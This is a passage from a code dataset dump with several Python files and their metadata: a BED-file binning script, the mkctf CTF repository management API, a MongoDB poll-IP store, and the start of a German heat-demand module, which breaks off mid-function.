{"api_name": "numpy.sqrt", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.r_", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.r_", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "scipy.linalg.norm", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.r_", "line_number": 56, "usage_type": "attribute"}]}
+{"seq_id": "124214128", "text": "#!/usr/bin/env python3\n\n# Author: Jeffrey Grover\n# Purpose: Create a new bed file where entries made of bins from the original\n# This is most useful for creating metaplots or looking at expression over a\n# fraction of the original features\n# Created: 2018-01-15\n# Refactored: 2019-06-22\n\nimport csv\nfrom argparse import ArgumentParser\n\n\n# Subroutine functions\n\ndef parse_bed_to_dict(input_bed):\n bed_dict = {}\n with open(input_bed, 'r') as input_handle:\n for line in input_handle:\n entry = line.strip().split('\\t')\n feature_id = entry[3]\n try:\n score = entry[4]\n except IndexError:\n score = '.'\n try:\n strand = entry[5]\n except IndexError:\n strand = '.'\n bed_dict[feature_id] = {\n 'chromosome': entry[0],\n 'start': int(entry[1]),\n 'stop': int(entry[2]),\n 'score': score,\n 'strand': strand\n }\n return bed_dict\n\n\ndef create_upstream_bins(bed_dict, window_size, bin_width, output_prefix):\n num_bins = int(window_size / bin_width)\n for i in range(num_bins):\n bin_number = i + 1 # Humans count starting at 1\n bin_start = window_size - (bin_width * i)\n bin_stop = bin_start - (bin_width - 1)\n upstream_file = '%su_%s_%s-%s.bed' % (output_prefix, str(bin_number).zfill(2), bin_start, bin_stop)\n with open(upstream_file, 'w') as upstream_handle:\n upstream_writer = csv.writer(upstream_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Bins for + and unstranded start at the feature - window size\n\n if strand in ('+', '.'):\n start = start - (window_size - (bin_width * i))\n stop = start + (bin_width - 1)\n\n # Bins for - strand start at 1 beyond the stop\n\n elif strand == '-':\n stop = stop + (window_size - (bin_width * i))\n start = stop - (bin_width - 1)\n\n # Output bins, but only if the bins are valid coordinates\n\n if start >= 0 and stop >= 0:\n output_row = [chromosome, start, stop, feature_id, score, strand]\n upstream_writer.writerow(output_row)\n\n\ndef create_downstream_bins(bed_dict, window_size, bin_width, output_prefix):\n num_bins = int(window_size / bin_width)\n for i in range(num_bins):\n bin_number = i + 1\n bin_start = (bin_width * i) + 1\n bin_stop = (bin_start - 1) + bin_width\n downstream_file = '%sd_%s_%s-%s.bed' % (output_prefix, str(bin_number).zfill(2), bin_start, bin_stop)\n with open(downstream_file, 'w') as downstream_handle:\n downstream_writer = csv.writer(downstream_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Bins for + and unstranded start at 1 beyond the feature stop\n\n if strand in ('+', '.'):\n start = stop + ((bin_width * i) + 1)\n stop = start + (bin_width - 1)\n\n # Bins for - strand start 1 before the start\n\n elif strand == '-':\n stop = start - ((bin_width * i) + 1)\n start = stop - (bin_width - 1)\n\n # Output bins, but only if the bins are valid coordinates\n\n if start >= 0 and stop >= 0:\n output_row = [chromosome, start, stop, feature_id, score, strand]\n downstream_writer.writerow(output_row)\n\n\ndef create_body_bins(bed_dict, window_size, bin_width, output_prefix):\n num_bins = int(window_size / bin_width)\n for i in range(num_bins):\n bin_number 
= i + 1\n bin_perc_length = bin_number * (100 / num_bins)\n body_file = '%sb_%s_%s.bed' % (output_prefix, str(bin_number).zfill(2), bin_perc_length)\n with open(body_file, 'w') as body_handle:\n body_writer = csv.writer(body_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n feature_length = stop - start\n body_bin_width = (feature_length / num_bins)\n\n # For + strand or unstranded bin coordinates start at start + 1\n # First and last will be 1nt shorter to so exact start can be its own bin\n\n if strand in ('+', '.'):\n if i == 0:\n start = start + 1\n else:\n start = int(round((start + (body_bin_width * i)), 0))\n stop = int(round((start + body_bin_width), 0) - 1)\n\n # For - strand bins are numbered from the bed file's \"stop\"\n # First will be 1nt shorter to so exact stop can be its own bin\n\n elif strand == '-':\n if i == 0:\n stop = int(round((stop - (body_bin_width * i)), 0) - 2)\n else:\n stop = int(round((stop - (body_bin_width * i)), 0) - 1)\n start = int(round((stop - body_bin_width), 0))\n\n # Output bins, but only if the bins are valid coordinates\n\n if start >= 0 and stop >= 0:\n output_row = [chromosome, start, stop, feature_id, score, strand]\n body_writer.writerow(output_row)\n\n\ndef get_start_coords(bed_dict, output_prefix):\n start_file = '%sstart.bed' % output_prefix\n with open(start_file, 'w') as start_handle:\n start_writer = csv.writer(start_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Start coordinates are zero-based already for + or unstranded\n\n if strand in ('+', '.'):\n stop = start + 1\n\n # For - strand some extra work is required\n\n elif strand == '-':\n start = stop - 1\n\n # Output bins\n\n output_row = [chromosome, start, stop, feature_id, score, strand]\n start_writer.writerow(output_row)\n\n\ndef get_stop_coords(bed_dict, output_prefix):\n stop_file = '%sstop.bed' % output_prefix\n with open(stop_file, 'w') as stop_handle:\n stop_writer = csv.writer(stop_handle, delimiter='\\t')\n for feature_id in bed_dict:\n chromosome = bed_dict[feature_id]['chromosome']\n score = bed_dict[feature_id]['score']\n strand = bed_dict[feature_id]['strand']\n start = bed_dict[feature_id]['start']\n stop = bed_dict[feature_id]['stop']\n\n # Stop coordinate begins at stop -1 for + or unstranded\n\n if strand in ('+', '.'):\n start = stop - 1\n\n # Already zero baed for - strand\n\n elif strand == '-':\n stop = start + 1\n\n # Output bins\n\n output_row = [chromosome, start, stop, feature_id, score, strand]\n stop_writer.writerow(output_row)\n\n\n# Parse command line options\n\ndef get_args():\n parser = ArgumentParser(\n description='Create separate bed files for desired bin sizes up and '\n 'downstream of an input bed file. Divides feature bodies into an equal '\n 'number of bins as well. Be sure to use bin widths that can be divided '\n 'evenly into your window size or it will likely fail. 
Start and stop of'\n ' each feature is also output as a bin of length 1.')\n parser.add_argument('input_bed',\n help='bed file to process',\n metavar='FILE.bed')\n parser.add_argument('-w', '--window',\n help='Size of up and downstream windows (nt)',\n type=int,\n metavar='INT')\n parser.add_argument('-b', '--bin_width',\n help='Bin size (nt)',\n type=int,\n metavar='INT')\n parser.add_argument('-p', '--prefix',\n help='Prefix for output files. Files will be output as: Prefix[body|up|down]_bin#_length[start-stop|percent].bed',\n metavar='PREFIX')\n return parser.parse_args()\n\n\n# Run the functions, create the bins\n\ndef main(args):\n bed_dict = parse_bed_to_dict(args.input_bed)\n create_body_bins(bed_dict, args.window, args.bin_width, args.output_prefix)\n create_upstream_bins(bed_dict, args.window, args.bin_width, args.output_prefix)\n create_downstream_bins(bed_dict, args.window, args.bin_width, args.output_prefix)\n get_start_coords(bed_dict, args.output_prefix)\n get_stop_coords(bed_dict, args.output_prefix)\n\n\nif __name__ == '__main__':\n args = get_args()\n main(args)\n", "sub_path": "bed_make_bins.py", "file_name": "bed_make_bins.py", "file_ext": "py", "file_size_in_byte": 9789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "csv.writer", "line_number": 48, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 83, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 117, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 157, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 184, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 211, "usage_type": "call"}]}
+{"seq_id": "73999657", "text": "# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# file: api.py\n# date: 2018-03-20\n# author: paul.dautry\n# purpose:\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# =============================================================================\n# IMPORTS\n# =============================================================================\nfrom pathlib import Path\nfrom slugify import slugify\nfrom argparse import ArgumentParser, Namespace\nfrom traceback import print_exc\nfrom mkctf.helper.logger import Logger\nfrom mkctf.helper.config import load_config\nfrom mkctf.command.init import init\nfrom mkctf.command.show import show\nfrom mkctf.command.build import build\nfrom mkctf.command.deploy import deploy\nfrom mkctf.command.status import status\nfrom mkctf.command.create import create\nfrom mkctf.command.delete import delete\nfrom mkctf.command.enable import enable\nfrom mkctf.command.export import export\nfrom mkctf.command.disable import disable\nfrom mkctf.command.configure import configure\nfrom mkctf.command.renew_flag import renew_flag\nfrom mkctf.object.repository import Repository\n# =============================================================================\n# CONFIGURATION\n# =============================================================================\nDEFAULT_SIZE = 32\nDEFAULT_TIMEOUT = 4 # seconds\n# =============================================================================\n# CLASSES\n# =============================================================================\nclass MKCTFAPI:\n \"\"\"Provides access to all functionalities programmatically\n\n \"\"\"\n @staticmethod\n def parse_args():\n \"\"\"Parse command line arguments\n\n Returns:\n Namespace -- [description]\n \"\"\"\n p = ArgumentParser(add_help=True,\n description=\"Manage CTF challenges repository.\")\n p.add_argument('-q', '--quiet', action='store_true',\n help=\"decrease program verbosity\")\n p.add_argument('-d', '--debug', action='store_true',\n help=\"output debug messages\")\n p.add_argument('--no-color', action='store_true',\n help=\"disable colored output\")\n p.add_argument('-r', '--repo-root', type=Path, default=Path.cwd(),\n help=\"repository's root folder absolute path.\")\n p.add_argument('-j', '--json', action='store_true',\n help=\"json formatted output.\")\n p.add_argument('-f', '--force', action='store_true',\n help=\"do not ask for confirmation.\")\n # -- add subparsers\n sps = p.add_subparsers(dest='command', metavar='COMMAND')\n sps.required = True\n # ---- init\n init_p = sps.add_parser('init', help=\"initializes mkctf repository.\")\n init_p.set_defaults(func=init)\n # ---- show\n show_p = sps.add_parser('show', help=\"shows challenges.\")\n show_p.add_argument('-c', '--category', help=\"challenge's category.\")\n show_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n show_p.set_defaults(func=show)\n # ---- create\n create_p = sps.add_parser('create', help=\"creates a challenge.\")\n create_p.set_defaults(func=create)\n # ---- delete\n delete_p = sps.add_parser('delete', help=\"deletes a challenge.\")\n delete_p.add_argument('category', help=\"challenge's category.\")\n delete_p.add_argument('slug', help=\"challenge's slug.\")\n delete_p.set_defaults(func=delete)\n # ---- configure\n configure_p = sps.add_parser('configure', help=\"edits repository's config \"\n \"or challenge's config.\")\n configure_p.add_argument('-c', '--category', help=\"challenge's category.\")\n 
configure_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n configure_p.set_defaults(func=configure)\n # ---- enable\n enable_p = sps.add_parser('enable', help=\"enables a challenge.\")\n enable_p.add_argument('category', help=\"challenge's category.\")\n enable_p.add_argument('slug', help=\"challenge's slug.\")\n enable_p.set_defaults(func=enable)\n # ---- disable\n disable_p = sps.add_parser('disable', help=\"disables a challenge.\")\n disable_p.add_argument('category', help=\"challenge's category.\")\n disable_p.add_argument('slug', help=\"challenge's slug.\")\n disable_p.set_defaults(func=disable)\n # ---- export\n export_p = sps.add_parser('export', help=\"exports enabled static \"\n \"challenges.\")\n export_p.add_argument('export_dir', type=Path,\n help=\"folder where archives must be written. If \"\n \"the folder does not exist it will be \"\n \"created.\")\n export_p.add_argument('-c', '--category', help=\"challenge's category.\")\n export_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n export_p.add_argument('--include-disabled', action='store_true',\n help=\"export disabled challenges too.\")\n export_p.set_defaults(func=export)\n # ---- renew-flag\n renew_flag_p = sps.add_parser('renew-flag',\n help=\"renews flags. You might want to \"\n \"build and deploy/export after that.\")\n renew_flag_p.add_argument('-c', '--category', help=\"challenge's category.\")\n renew_flag_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n renew_flag_p.add_argument('--size', type=int, default=DEFAULT_SIZE,\n help=\"flag's random string size (in bytes).\")\n renew_flag_p.set_defaults(func=renew_flag)\n # ---- build\n build_p = sps.add_parser('build',\n help=\"builds challenges. After building \"\n \"challenges you might want to deploy/export.\")\n build_p.add_argument('-c', '--category', help=\"challenge's category.\")\n build_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n build_p.add_argument('-t', '--timeout', type=int, default=DEFAULT_TIMEOUT,\n help=\"override default timeout for subprocesses.\")\n build_p.set_defaults(func=build)\n # ---- deploy\n deploy_p = sps.add_parser('deploy', help=\"deploy challenges.\")\n deploy_p.add_argument('-c', '--category', help=\"challenge's category.\")\n deploy_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n deploy_p.add_argument('-t', '--timeout', type=int, default=DEFAULT_TIMEOUT,\n help=\"override default timeout for subprocesses.\")\n deploy_p.set_defaults(func=deploy)\n # ---- status\n status_p = sps.add_parser('status', help=\"check deployed challenge's \"\n \"status using exploit/exploit.\")\n status_p.add_argument('-c', '--category', help=\"challenge's category.\")\n status_p.add_argument('-s', '--slug', help=\"challenge's slug.\")\n status_p.add_argument('-t', '--timeout', type=int, default=DEFAULT_TIMEOUT,\n help=\"override default timeout for subprocesses.\")\n status_p.set_defaults(func=status)\n\n args = p.parse_args()\n\n args.configuration = None\n\n return args\n\n def __init__(self, repo_root,\n debug, quiet, no_color,\n out=None):\n \"\"\"Constructs a new instance\n\n Arguments:\n repo_root {Path} -- [description]\n debug {bool} -- [description]\n quiet {bool} -- [description]\n no_color {bool} -- [description]\n\n Keyword Arguments:\n out {IOBase} -- [description] (default: {None})\n \"\"\"\n\n super(MKCTFAPI, self).__init__()\n self.logger = Logger(debug, quiet, no_color, out)\n\n self.repo_root = Path(repo_root)\n self.logger.debug('repo_root: {}'.format(self.repo_root))\n\n 
self.glob_conf_path = Path.home() / '.config/mkctf.yml'\n        self.logger.debug('glob_conf_path: {}'.format(self.glob_conf_path))\n\n        self.glob_conf = load_config(self.glob_conf_path)\n        self.logger.debug('glob_conf: {}'.format(self.glob_conf))\n\n        self.repo_conf_path = self.repo_root / self.glob_conf['files']['config']['repository']\n        self.logger.debug('repo_conf_path: {}'.format(self.repo_conf_path))\n\n        self.repo = Repository(self.logger, self.repo_conf_path, self.glob_conf)\n\n    async def perform(self, ns):\n        \"\"\"Performs a command using the given Namespace ns\n\n        Arguments:\n            ns {[type]} -- [description]\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        self.logger.info(\"mkctf starts...\")\n        self.logger.debug(\"ns: {}\".format(ns))\n\n        if ns.command != 'init' and self.repo.get_conf() is None:\n            self.logger.fatal(\"mkctf repository must be initialized first. \"\n                              \"Run `mkctf init`.\")\n\n        try:\n            # -----------------------------------------------------------------\n            # 'result' content depending on json argument value:\n            # if ns.json:\n            #     result = dict or None\n            # else:\n            #     result = True or False\n            # -----------------------------------------------------------------\n            result = await ns.func(ns, self.repo, self.logger)\n        except Exception as e:\n            print_exc()\n            self.logger.fatal(\"Ouuuuupss.....:(\")\n\n        if result:\n            self.logger.info(\"mkctf ended successfully.\")\n        else:\n            self.logger.error(\"mkctf ended with errors.\")\n\n        return result\n\n    def __ns(self, func):\n        \"\"\"Creates a standard Namespace used by all functions of the API\n\n        Arguments:\n            func {function} -- [description]\n\n        Returns:\n            Namespace -- [description]\n        \"\"\"\n        ns = Namespace()\n        ns.json = True\n        ns.force = True\n        ns.no_color = True\n        ns.command = func.__name__\n        ns.func = func\n        return ns\n\n    def init(self):\n        \"\"\"API wrapper for 'init' command\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(init)\n        # perform\n        return self.perform(ns)\n\n    def show(self):\n        \"\"\"API wrapper for 'show' command\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(show)\n        # perform\n        return self.perform(ns)\n\n    def create(self,\n               category,\n               name,\n               flag,\n               points,\n               parameters={},\n               enabled=False,\n               standalone=True):\n        \"\"\"API wrapper for 'create' command\n\n        Arguments:\n            category {str} -- [description]\n            name {str} -- [description]\n            flag {str} -- [description]\n            points {int} -- [description]\n            parameters {dict} -- [description]\n            enabled {bool} -- [description]\n            standalone {bool} -- [description]\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(create)\n        # parameters\n        ns.configuration = {\n            'name': name,\n            'slug': slugify(name),\n            'flag': flag,\n            'points': points,\n            'enabled': enabled,\n            'category': category,\n            'parameters': parameters,\n            'standalone': standalone\n        }\n        # perform\n        return self.perform(ns)\n\n    def delete(self, category=None, slug=None):\n        \"\"\"API wrapper for 'delete' command\n\n        Keyword Arguments:\n            category {str} -- [description] (default: {None})\n            slug {str} -- [description] (default: {None})\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(delete)\n        # parameters\n        ns.category = category\n        ns.slug = slug\n        # perform\n        return self.perform(ns)\n\n    def configure(self, configuration, category=None, slug=None):\n        \"\"\"API wrapper for 'configure' command\n\n        Arguments:\n            configuration {dict} -- [description]\n\n        Keyword Arguments:\n            category {str} -- [description] (default: {None})\n            slug {str} -- [description] (default: {None})\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(configure)\n        # parameters\n        ns.configuration = configuration\n        ns.category = category\n        ns.slug = slug\n        # perform\n        return self.perform(ns)\n\n    def enable(self, category, slug):\n        \"\"\"API wrapper for 'enable' command\n\n        Arguments:\n            category {str} -- [description]\n            slug {str} -- [description]\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(enable)\n        # parameters\n        ns.category = category\n        ns.slug = slug\n        # perform\n        return self.perform(ns)\n\n    def disable(self, category, slug):\n        \"\"\"API wrapper for 'disable' command\n\n        Arguments:\n            category {str} -- [description]\n            slug {str} -- [description]\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(disable)\n        # parameters\n        ns.category = category\n        ns.slug = slug\n        # perform\n        return self.perform(ns)\n\n    def export(self, export_dir,\n               category=None, slug=None,\n               include_disabled=False):\n        \"\"\"API wrapper for 'export' command\n\n        Arguments:\n            export_dir {Path} -- [description]\n\n        Keyword Arguments:\n            category {str} -- [description] (default: {None})\n            slug {str} -- [description] (default: {None})\n            include_disabled {bool} -- [description] (default: {False})\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(export)\n        # parameters\n        ns.export_dir = export_dir\n        ns.category = category\n        ns.slug = slug\n        ns.include_disabled = include_disabled\n        # perform\n        return self.perform(ns)\n\n    def renew_flag(self, category=None, slug=None, size=DEFAULT_SIZE):\n        \"\"\"API wrapper for 'renew_flag' command\n\n        Keyword Arguments:\n            category {str} -- [description] (default: {None})\n            slug {str} -- [description] (default: {None})\n            size {int} -- [description] (default: {DEFAULT_SIZE})\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(renew_flag)\n        # parameters\n        ns.category = category\n        ns.slug = slug\n        ns.size = size\n        # perform\n        return self.perform(ns)\n\n    def build(self, category=None, slug=None, timeout=DEFAULT_TIMEOUT):\n        \"\"\"API wrapper for 'build' command\n\n        Keyword Arguments:\n            category {str} -- [description] (default: {None})\n            slug {str} -- [description] (default: {None})\n            timeout {int} -- [description] (default: {DEFAULT_TIMEOUT})\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(build)\n        # parameters\n        ns.category = category\n        ns.slug = slug\n        ns.timeout = timeout\n        # perform\n        return self.perform(ns)\n\n    def deploy(self, category=None, slug=None, timeout=DEFAULT_TIMEOUT):\n        \"\"\"API wrapper for 'deploy' command\n\n        Keyword Arguments:\n            category {str} -- [description] (default: {None})\n            slug {str} -- [description] (default: {None})\n            timeout {int} -- [description] (default: {DEFAULT_TIMEOUT})\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(deploy)\n        # parameters\n        ns.category = category\n        ns.slug = slug\n        ns.timeout = timeout\n        # perform\n        return self.perform(ns)\n\n    def status(self, category=None, slug=None, timeout=DEFAULT_TIMEOUT):\n        \"\"\"API wrapper for 'status' command\n\n        Keyword Arguments:\n            category {str} -- [description] (default: {None})\n            slug {str} -- [description] (default: {None})\n            timeout {int} -- [description] (default: {DEFAULT_TIMEOUT})\n\n        Returns:\n            [type] -- [description]\n        \"\"\"\n        ns = self.__ns(status)\n        # parameters\n        ns.category = category\n        ns.slug = slug\n        ns.timeout = timeout\n        # perform\n        return self.perform(ns)\n", "sub_path": "mkctf/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 16802, "program_lang": "python", "lang": "en", "doc_type": "code",
"dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 49, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 57, "usage_type": "name"}, {"api_name": "pathlib.Path.cwd", "line_number": 57, "usage_type": "call"}, {"api_name": "mkctf.command.init.init", "line_number": 68, "usage_type": "name"}, {"api_name": "mkctf.command.show.show", "line_number": 73, "usage_type": "name"}, {"api_name": "mkctf.command.create.create", "line_number": 76, "usage_type": "name"}, {"api_name": "mkctf.command.delete.delete", "line_number": 81, "usage_type": "name"}, {"api_name": "mkctf.command.configure.configure", "line_number": 87, "usage_type": "name"}, {"api_name": "mkctf.command.enable.enable", "line_number": 92, "usage_type": "name"}, {"api_name": "mkctf.command.disable.disable", "line_number": 97, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 101, "usage_type": "name"}, {"api_name": "mkctf.command.export.export", "line_number": 109, "usage_type": "name"}, {"api_name": "mkctf.command.renew_flag.renew_flag", "line_number": 118, "usage_type": "name"}, {"api_name": "mkctf.command.build.build", "line_number": 127, "usage_type": "name"}, {"api_name": "mkctf.command.deploy.deploy", "line_number": 134, "usage_type": "name"}, {"api_name": "mkctf.command.status.status", "line_number": 142, "usage_type": "name"}, {"api_name": "mkctf.helper.logger.Logger", "line_number": 166, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 168, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 171, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 171, "usage_type": "name"}, {"api_name": "mkctf.helper.config.load_config", "line_number": 174, "usage_type": "call"}, {"api_name": "mkctf.object.repository.Repository", "line_number": 180, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 208, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 227, "usage_type": "call"}, {"api_name": "mkctf.command.init.init", "line_number": 241, "usage_type": "argument"}, {"api_name": "mkctf.command.show.show", "line_number": 251, "usage_type": "argument"}, {"api_name": "mkctf.command.create.create", "line_number": 277, "usage_type": "argument"}, {"api_name": "slugify.slugify", "line_number": 281, "usage_type": "call"}, {"api_name": "mkctf.command.delete.delete", "line_number": 302, "usage_type": "argument"}, {"api_name": "mkctf.command.enable.enable", "line_number": 322, "usage_type": "argument"}, {"api_name": "mkctf.command.enable.enable", "line_number": 340, "usage_type": "argument"}, {"api_name": "mkctf.command.disable.disable", "line_number": 357, "usage_type": "argument"}, {"api_name": "mkctf.command.export.export", "line_number": 380, "usage_type": "argument"}, {"api_name": "mkctf.command.renew_flag.renew_flag", "line_number": 400, "usage_type": "argument"}, {"api_name": "mkctf.command.build.build", "line_number": 419, "usage_type": "argument"}, {"api_name": "mkctf.command.deploy.deploy", "line_number": 438, "usage_type": "argument"}, {"api_name": "mkctf.command.status.status", "line_number": 457, "usage_type": "argument"}]}
+{"seq_id": "309707249", "text": "# -*- coding: utf-8 -*-\nimport pymongo\nfrom bson.objectid import ObjectId\nfrom db import DB\nimport datetime\n\nclass PollIpRepository(DB):\n\n def __init__(self,pollId):\n DB.__init__(self)\n self.table = self.database['ip_%s'%pollId]\n\n def CreateIndex(self):\n self.table.ensure_index('ip',unique=False)\n\n def GetIpCount(self,dataId=None,ip=None,ipLimitTime=None):\n '''返回指定时间内的ip数'''\n condition ={}\n if dataId:\n condition['data_id'] = dataId\n if ip:\n condition['ip'] = ip\n if ipLimitTime:\n startTime = datetime.datetime.now() - datetime.timedelta(seconds=ipLimitTime)\n condition['isrtdate'] = {'$gte':startTime}\n cur = self.table.find(condition)\n return cur.count()\n\n def Search(self,data_id=None,ip=None,sort='isrtdate',desc=True,start=0,count=10):\n condition = {}\n\n #\n\n #如果用户按照uid或者id搜索。则将条件设置为唯一搜索\n if data_id:\n condition['data_id'] = data_id\n\n if ip:\n condition['ip'] = ip\n\n\n cur = self.table.find(condition)\n #满足条件的总记录数\n totalCount = cur.count()\n #设定排序\n sortType = pymongo.ASCENDING\n if desc:\n sortType = pymongo.DESCENDING\n cur = cur.skip(start).limit(count).sort(sort, sortType)\n recordList =list()\n for item in cur:\n recordList.append(item)\n return {'list':recordList,'total_count':totalCount}\n\n def Save(self,data):\n self.table.save(data)\n return True\n\n def Remove(self,id):\n self.table.remove({'id':id})\n return True\n\n def RemoveAll(self):\n self.table.remove()\n return True\n\nif __name__=='__main__':\n pass", "sub_path": "app/repository/pollip.py", "file_name": "pollip.py", "file_ext": "py", "file_size_in_byte": 1826, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "db.DB", "line_number": 7, "usage_type": "name"}, {"api_name": "db.DB.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "db.DB", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 24, "usage_type": "call"}, {"api_name": "pymongo.ASCENDING", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pymongo.DESCENDING", "line_number": 48, "usage_type": "attribute"}]}
+{"seq_id": "600577837", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Processing a list of power plants in Germany.\n\nSPDX-FileCopyrightText: 2016-2021 Uwe Krien \n\nSPDX-License-Identifier: MIT\n\"\"\"\n__copyright__ = \"Uwe Krien \"\n__license__ = \"MIT\"\n\n\n# Python libraries\nimport os\nimport logging\n\n# External libraries\nimport pandas as pd\nfrom workalendar.europe import Germany\n\n# oemof libraries\nimport demandlib.bdew as bdew\n\n# internal modules\nfrom reegis import config as cfg\nfrom reegis import bmwi\nfrom reegis import geometries\nfrom reegis import energy_balance\nfrom reegis import coastdat\nfrom reegis import inhabitants\n\n\ndef heat_demand(year):\n \"\"\"\n Fetch heat demand per sector from the federal states energy balances.\n\n If the share between domestic and retail does not exist the share from\n the german balance is used. If this value also not exists a default\n share of 0.5 is used.\n\n Parameters\n ----------\n year\n\n Returns\n -------\n pandas.DataFrame\n\n Examples\n --------\n >>> hd=heat_demand(2014)\n >>> hd.loc[('MV', 'domestic'), 'district heating']\n 5151.5\n \"\"\"\n eb = energy_balance.get_usage_balance(year)\n eb.sort_index(inplace=True)\n\n # get fraction of domestic and retail from the german energy balance\n share = energy_balance.get_domestic_retail_share(year)\n\n # Use 0.5 for both sectors if no value is given\n share.fillna(0.5, inplace=True)\n\n # Divide domestic and retail by the value of the german energy balance if\n # the sum of domestic and retail does not equal the value given in the\n # local energy balance.\n check_value = True\n for state in eb.index.get_level_values(0).unique():\n for col in eb.columns:\n check = (\n eb.loc[(state, \"domestic\"), col]\n + eb.loc[(state, \"retail\"), col]\n - eb.loc[(state, \"domestic and retail\"), col]\n ).round()\n if check < 0:\n for sector in [\"domestic\", \"retail\"]:\n try:\n eb.loc[(state, sector), col] = (\n eb.loc[(state, \"domestic and retail\"), col]\n * share.loc[col, sector]\n )\n except KeyError:\n eb.loc[(state, sector), col] = (\n eb.loc[(state, \"domestic and retail\"), col] * 0.5\n )\n\n check = (\n eb.loc[(state, \"domestic\"), col]\n + eb.loc[(state, \"retail\"), col]\n - eb.loc[(state, \"domestic and retail\"), col]\n ).round()\n\n if check < 0:\n logging.error(\n \"In {0} the {1} sector results {2}\".format(\n state, col, check\n )\n )\n check_value = False\n if check_value:\n logging.debug(\"Divides 'domestic and retail' without errors.\")\n\n # Reduce energy balance to the needed columns and group by fuel groups.\n eb = eb.loc[\n (slice(None), [\"industrial\", \"domestic\", \"retail\"]),\n ]\n\n eb = eb.groupby(by=cfg.get_dict(\"FUEL_GROUPS_HEAT_DEMAND\"), axis=1).sum()\n\n # Remove empty columns\n for col in eb.columns:\n if not (\n eb.loc[(slice(None), \"domestic\"), col].sum() > 0\n or eb.loc[(slice(None), \"retail\"), col].sum() > 0\n or eb.loc[(slice(None), \"industrial\"), col].sum() > 0\n ):\n del eb[col]\n\n # The use of electricity belongs to the electricity sector. 
